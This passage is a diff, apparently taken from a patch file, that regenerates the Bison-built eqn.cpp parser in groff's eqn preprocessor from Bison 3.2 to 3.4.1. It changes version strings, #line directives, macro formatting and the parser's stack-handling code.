- /* Bison version. */
--#define YYBISON_VERSION "3.2"
-+#define YYBISON_VERSION "3.4.1"
-
- /* Skeleton name. */
- #define YYSKELETON_NAME "yacc.c"
-@@ -65,7 +66,11 @@
-
-
- /* First part of user prologue. */
--#line 18 "../src/preproc/eqn/eqn.ypp" /* yacc.c:338 */
-+#line 18 "src/preproc/eqn/eqn.ypp"
-+
-+#if HAVE_CONFIG_H
-+# include <config.h>
-+#endif
-
- #include <stdio.h>
- #include <string.h>
-@@ -77,7 +82,8 @@ extern int non_empty_flag;
- int yylex();
- void yyerror(const char *);
-
--#line 81 "src/preproc/eqn/eqn.cpp" /* yacc.c:338 */
-+#line 86 "src/preproc/eqn/eqn.cpp"
-+
- # ifndef YY_NULLPTR
- # if defined __cplusplus
- # if 201103L <= __cplusplus
-@@ -98,8 +104,8 @@ void yyerror(const char *);
- # define YYERROR_VERBOSE 0
- #endif
-
--/* In a future release of Bison, this section will be replaced
-- by #include "y.tab.h". */
-+/* Use api.header.include to #include this header
-+ instead of duplicating it here. */
- #ifndef YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- # define YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- /* Debug traces. */
-@@ -237,10 +243,9 @@ extern int yydebug;
-
- /* Value type. */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:353 */
-+#line 34 "src/preproc/eqn/eqn.ypp"
-
- char *str;
- box *b;
-@@ -249,9 +254,9 @@ union YYSTYPE
- int n;
- column *col;
-
--#line 253 "src/preproc/eqn/eqn.cpp" /* yacc.c:353 */
--};
-+#line 258 "src/preproc/eqn/eqn.cpp"
-
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
-@@ -366,6 +371,8 @@ typedef short yytype_int16;
- #endif
-
-
-+#define YY_ASSERT(E) ((void) (0 && (E)))
-+
- #if ! defined yyoverflow || YYERROR_VERBOSE
-
- /* The parser invokes alloca or malloc; define the necessary symbols. */
-@@ -508,16 +515,16 @@ union yyalloc
- /* YYNSTATES -- Number of states. */
- #define YYNSTATES 142
-
--/* YYTRANSLATE[YYX] -- Symbol number corresponding to YYX as returned
-- by yylex, with out-of-bounds checking. */
- #define YYUNDEFTOK 2
- #define YYMAXUTOK 315
-
-+/* YYTRANSLATE(TOKEN-NUM) -- Symbol number corresponding to TOKEN-NUM
-+ as returned by yylex, with out-of-bounds checking. */
- #define YYTRANSLATE(YYX) \
- ((unsigned) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK)
-
- /* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM
-- as returned by yylex, without out-of-bounds checking. */
-+ as returned by yylex. */
- static const yytype_uint8 yytranslate[] =
- {
- 0, 2, 2, 2, 2, 2, 2, 2, 2, 63,
-@@ -558,14 +565,14 @@ static const yytype_uint8 yytranslate[] =
- /* YYRLINE[YYN] -- Source line where rule number YYN was defined. */
- static const yytype_uint16 yyrline[] =
- {
-- 0, 121, 121, 123, 128, 130, 141, 143, 145, 150,
-- 152, 154, 156, 158, 163, 165, 167, 169, 174, 176,
-- 181, 183, 185, 190, 192, 194, 196, 198, 200, 202,
-- 204, 206, 208, 210, 212, 214, 216, 218, 220, 222,
-- 224, 226, 228, 230, 232, 234, 236, 238, 240, 242,
-- 244, 246, 248, 250, 252, 254, 259, 269, 271, 276,
-- 278, 283, 285, 290, 292, 297, 299, 304, 306, 308,
-- 310, 314, 316, 321, 323, 325
-+ 0, 125, 125, 127, 132, 134, 145, 147, 149, 154,
-+ 156, 158, 160, 162, 167, 169, 171, 173, 178, 180,
-+ 185, 187, 189, 194, 196, 198, 200, 202, 204, 206,
-+ 208, 210, 212, 214, 216, 218, 220, 222, 224, 226,
-+ 228, 230, 232, 234, 236, 238, 240, 242, 244, 246,
-+ 248, 250, 252, 254, 256, 258, 263, 273, 275, 280,
-+ 282, 287, 289, 294, 296, 301, 303, 308, 310, 312,
-+ 314, 318, 320, 325, 327, 329
- };
- #endif
-
-@@ -818,22 +825,22 @@ static const yytype_uint8 yyr2[] =
-
- #define YYRECOVERING() (!!yyerrstatus)
-
--#define YYBACKUP(Token, Value) \
--do \
-- if (yychar == YYEMPTY) \
-- { \
-- yychar = (Token); \
-- yylval = (Value); \
-- YYPOPSTACK (yylen); \
-- yystate = *yyssp; \
-- goto yybackup; \
-- } \
-- else \
-- { \
-- yyerror (YY_("syntax error: cannot back up")); \
-- YYERROR; \
-- } \
--while (0)
-+#define YYBACKUP(Token, Value) \
-+ do \
-+ if (yychar == YYEMPTY) \
-+ { \
-+ yychar = (Token); \
-+ yylval = (Value); \
-+ YYPOPSTACK (yylen); \
-+ yystate = *yyssp; \
-+ goto yybackup; \
-+ } \
-+ else \
-+ { \
-+ yyerror (YY_("syntax error: cannot back up")); \
-+ YYERROR; \
-+ } \
-+ while (0)
-
- /* Error token number */
- #define YYTERROR 1
-@@ -948,7 +955,7 @@ yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule)
- YYFPRINTF (stderr, " $%d = ", yyi + 1);
- yy_symbol_print (stderr,
- yystos[yyssp[yyi + 1 - yynrhs]],
-- &(yyvsp[(yyi + 1) - (yynrhs)])
-+ &yyvsp[(yyi + 1) - (yynrhs)]
- );
- YYFPRINTF (stderr, "\n");
- }
-@@ -1052,7 +1059,10 @@ yytnamerr (char *yyres, const char *yystr)
- case '\\':
- if (*++yyp != '\\')
- goto do_not_strip_quotes;
-- /* Fall through. */
-+ else
-+ goto append;
-+
-+ append:
- default:
- if (yyres)
- yyres[yyn] = *yyp;
-@@ -1148,10 +1158,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
- yyarg[yycount++] = yytname[yyx];
- {
- YYSIZE_T yysize1 = yysize + yytnamerr (YY_NULLPTR, yytname[yyx]);
-- if (! (yysize <= yysize1
-- && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+ if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+ yysize = yysize1;
-+ else
- return 2;
-- yysize = yysize1;
- }
- }
- }
-@@ -1175,9 +1185,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
-
- {
- YYSIZE_T yysize1 = yysize + yystrlen (yyformat);
-- if (! (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+ if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+ yysize = yysize1;
-+ else
- return 2;
-- yysize = yysize1;
- }
-
- if (*yymsg_alloc < yysize)
-@@ -1303,23 +1314,33 @@ yyparse (void)
- yychar = YYEMPTY; /* Cause a token to be read. */
- goto yysetstate;
-
-+
- /*------------------------------------------------------------.
--| yynewstate -- Push a new state, which is found in yystate. |
-+| yynewstate -- push a new state, which is found in yystate. |
- `------------------------------------------------------------*/
-- yynewstate:
-+yynewstate:
- /* In all cases, when you get here, the value and location stacks
- have just been pushed. So pushing a state here evens the stacks. */
- yyssp++;
-
-- yysetstate:
-+
-+/*--------------------------------------------------------------------.
-+| yynewstate -- set current state (the top of the stack) to yystate. |
-+`--------------------------------------------------------------------*/
-+yysetstate:
-+ YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+ YY_ASSERT (0 <= yystate && yystate < YYNSTATES);
- *yyssp = (yytype_int16) yystate;
-
- if (yyss + yystacksize - 1 <= yyssp)
-+#if !defined yyoverflow && !defined YYSTACK_RELOCATE
-+ goto yyexhaustedlab;
-+#else
- {
- /* Get the current used size of the three stacks, in elements. */
- YYSIZE_T yysize = (YYSIZE_T) (yyssp - yyss + 1);
-
--#ifdef yyoverflow
-+# if defined yyoverflow
- {
- /* Give user a chance to reallocate the stack. Use copies of
- these so that the &'s don't force the real ones into
-@@ -1338,10 +1359,7 @@ yyparse (void)
- yyss = yyss1;
- yyvs = yyvs1;
- }
--#else /* no yyoverflow */
--# ifndef YYSTACK_RELOCATE
-- goto yyexhaustedlab;
--# else
-+# else /* defined YYSTACK_RELOCATE */
- /* Extend the stack our own way. */
- if (YYMAXDEPTH <= yystacksize)
- goto yyexhaustedlab;
-@@ -1357,12 +1375,11 @@ yyparse (void)
- goto yyexhaustedlab;
- YYSTACK_RELOCATE (yyss_alloc, yyss);
- YYSTACK_RELOCATE (yyvs_alloc, yyvs);
--# undef YYSTACK_RELOCATE
-+# undef YYSTACK_RELOCATE
- if (yyss1 != yyssa)
- YYSTACK_FREE (yyss1);
- }
- # endif
--#endif /* no yyoverflow */
-
- yyssp = yyss + yysize - 1;
- yyvsp = yyvs + yysize - 1;
-@@ -1373,19 +1390,18 @@ yyparse (void)
- if (yyss + yystacksize - 1 <= yyssp)
- YYABORT;
- }
--
-- YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+#endif /* !defined yyoverflow && !defined YYSTACK_RELOCATE */
-
- if (yystate == YYFINAL)
- YYACCEPT;
-
- goto yybackup;
-
-+
- /*-----------.
- | yybackup. |
- `-----------*/
- yybackup:
--
- /* Do appropriate processing given the current state. Read a
- lookahead token if we need one and don't already have one. */
-
-@@ -1443,7 +1459,6 @@ yybackup:
- YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
- *++yyvsp = yylval;
- YY_IGNORE_MAYBE_UNINITIALIZED_END
--
- goto yynewstate;
-
-
-@@ -1458,7 +1473,7 @@ yydefault:
-
-
- /*-----------------------------.
--| yyreduce -- Do a reduction. |
-+| yyreduce -- do a reduction. |
- `-----------------------------*/
- yyreduce:
- /* yyn is the number of a rule to reduce with. */
-@@ -1478,20 +1493,20 @@ yyreduce:
- YY_REDUCE_PRINT (yyn);
- switch (yyn)
- {
-- case 3:
--#line 124 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+ case 3:
-+#line 128 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].b)->top_level(); non_empty_flag = 1; }
--#line 1485 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1500 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 4:
--#line 129 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 133 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1491 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1506 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 5:
--#line 131 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 135 "src/preproc/eqn/eqn.ypp"
- {
- list_box *lb = (yyvsp[-1].b)->to_list_box();
- if (!lb)
-@@ -1499,436 +1514,437 @@ yyreduce:
- lb->append((yyvsp[0].b));
- (yyval.b) = lb;
- }
--#line 1503 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1518 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 6:
--#line 142 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 146 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1509 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1524 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 7:
--#line 144 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 148 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_mark_box((yyvsp[0].b)); }
--#line 1515 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1530 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 8:
--#line 146 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 150 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_lineup_box((yyvsp[0].b)); }
--#line 1521 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1536 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 9:
--#line 151 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 155 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1527 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1542 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 10:
--#line 153 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 157 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1533 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1548 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 11:
--#line 155 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 159 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1539 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1554 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 12:
--#line 157 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 161 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1545 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1560 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 13:
--#line 159 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 163 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-4].b), make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0), 0); }
--#line 1551 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1566 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 14:
--#line 164 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 168 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1557 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1572 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 15:
--#line 166 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 170 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_sqrt_box((yyvsp[0].b)); }
--#line 1563 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1578 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 16:
--#line 168 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 172 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1569 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1584 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 17:
--#line 170 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 174 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_small_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1575 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1590 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 18:
--#line 175 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 179 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1581 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1596 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 19:
--#line 177 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 181 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1587 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1602 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 20:
--#line 182 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 186 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1593 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1608 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 21:
--#line 184 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 188 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1599 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1614 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 22:
--#line 186 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 190 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1605 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1620 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 23:
--#line 191 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 195 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1611 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1626 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 24:
--#line 193 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 197 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1617 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1632 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 25:
--#line 195 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 199 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1623 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1638 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 26:
--#line 197 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 201 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1629 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1644 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 27:
--#line 199 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 203 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new half_space_box; }
--#line 1635 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1650 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 28:
--#line 201 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 205 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new space_box; }
--#line 1641 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1656 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 29:
--#line 203 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 207 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new tab_box; }
--#line 1647 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1662 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 30:
--#line 205 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 209 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[-1].b); }
--#line 1653 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1668 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 31:
--#line 207 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 211 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1659 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1674 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 32:
--#line 209 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 213 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(LEFT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1665 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1680 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 33:
--#line 211 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 215 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(RIGHT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1671 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1686 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 34:
--#line 213 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 217 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1677 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1692 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 35:
--#line 215 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 219 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[-1].mb); }
--#line 1683 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1698 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 36:
--#line 217 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 221 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_delim_box((yyvsp[-3].str), (yyvsp[-2].b), (yyvsp[0].str)); }
--#line 1689 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1704 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 37:
--#line 219 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 223 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_delim_box((yyvsp[-1].str), (yyvsp[0].b), 0); }
--#line 1695 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1710 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 38:
--#line 221 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 225 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_overline_box((yyvsp[-1].b)); }
--#line 1701 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1716 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 39:
--#line 223 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 227 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_underline_box((yyvsp[-1].b)); }
--#line 1707 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1722 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 40:
--#line 225 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 229 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_prime_box((yyvsp[-1].b)); }
--#line 1713 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1728 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 41:
--#line 227 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 231 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_accent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1719 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1734 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 42:
--#line 229 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 233 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_uaccent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1725 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1740 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 43:
--#line 231 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 235 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_grfont()), (yyvsp[0].b)); }
--#line 1731 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1746 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 44:
--#line 233 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 237 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_gbfont()), (yyvsp[0].b)); }
--#line 1737 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1752 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 45:
--#line 235 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 239 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_gfont()), (yyvsp[0].b)); }
--#line 1743 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1758 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 46:
--#line 237 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 241 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new fat_box((yyvsp[0].b)); }
--#line 1749 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1764 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 47:
--#line 239 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 243 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1755 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1770 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 48:
--#line 241 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 245 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new size_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1761 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1776 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 49:
--#line 243 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 247 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new hmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1767 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1782 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 50:
--#line 245 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 249 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new hmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1773 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1788 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 51:
--#line 247 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 251 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1779 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1794 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 52:
--#line 249 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 253 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1785 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1800 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 53:
--#line 251 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 255 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].b)->set_spacing_type((yyvsp[-1].str)); (yyval.b) = (yyvsp[0].b); }
--#line 1791 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1806 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 54:
--#line 253 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 257 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vcenter_box((yyvsp[0].b)); }
--#line 1797 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1812 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 55:
--#line 255 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 259 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_special_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1803 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1818 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 56:
--#line 260 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 264 "src/preproc/eqn/eqn.ypp"
- {
- int n;
- if (sscanf((yyvsp[0].str), "%d", &n) == 1)
- (yyval.n) = n;
- a_delete (yyvsp[0].str);
- }
--#line 1814 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1829 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 57:
--#line 270 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 274 "src/preproc/eqn/eqn.ypp"
